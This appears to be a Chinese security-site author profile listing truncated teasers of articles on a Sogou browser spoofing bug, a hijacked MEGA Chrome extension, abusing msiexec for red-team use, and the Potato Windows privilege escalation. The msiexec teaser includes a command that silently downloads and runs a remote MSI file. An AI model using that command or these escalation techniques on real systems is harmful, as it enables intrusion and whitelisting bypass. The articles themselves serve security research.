3gstudent 3gstudent
个性签名:
0
金币
1
等级
121
发布文章数
0x00 引言 最早在几年前看到一本书《挖0day》,里面介绍了一个搜狗浏览器的漏洞--伪造网站,虽然时隔四年搜狗还是犯了同样的错误,不过那会儿俺是只知道有这个理儿,但是苦于对这个理解并不深,现在接触的时间多了,渐渐的就快要走到入门的门口了。 发生在浏览器上的两种问题经常革了程序员下班时间的命(真是抱歉……),一种是代码缺陷,一种是逻辑问题。 前面的倒还好说,写错了当然就是写错
安全研究人员发现MEGA Chrome扩展程序已被盗用以窃取用户登录凭据和加密货币密钥。一旦发现扩展程序被恶意软件变体替换,Google就会从Chrome网上应用店中删除该扩展程序。 这个黑客攻击最初是由安全研究员、Monero项目参与者SerHack发现的 ,他立即在Twitter上发布了警告,称3.39.4版本的MEGA Chrome扩展程序遭到黑客攻击。其他安全研究人员也迅速
前言 受到subTee已经完成的应用程序白名单工作的启发,我们决定寻找合法的Windows二进制文件,这些文件可以用于红队、突围测试等的恶意方法。 利用官方msiexec.exe二进制从Web服务器上下载一个MSI文件是可能的,并作为标准域用户执行它: MsiExec /i https://www.url.com/test.png /q 创建恶意MSI 下面将告诉你如何使用Metas
工作原理: Potato利用已知的Windows中的问题,以获得本地权限提升,即NTLM中继(特别是基于HTTP > SMB中继)和NBNS欺骗。 使用下面介绍的技术,它有可能为一个非特权用户获得对Windows主机的默认配置”NT AUTHORITY \ SYSYTEM”级别的访问。 该漏洞是由3个主要部分,所有这些都有些配置通过命令行执行: 0x01 本地NBNS欺骗器 NBNS是一个广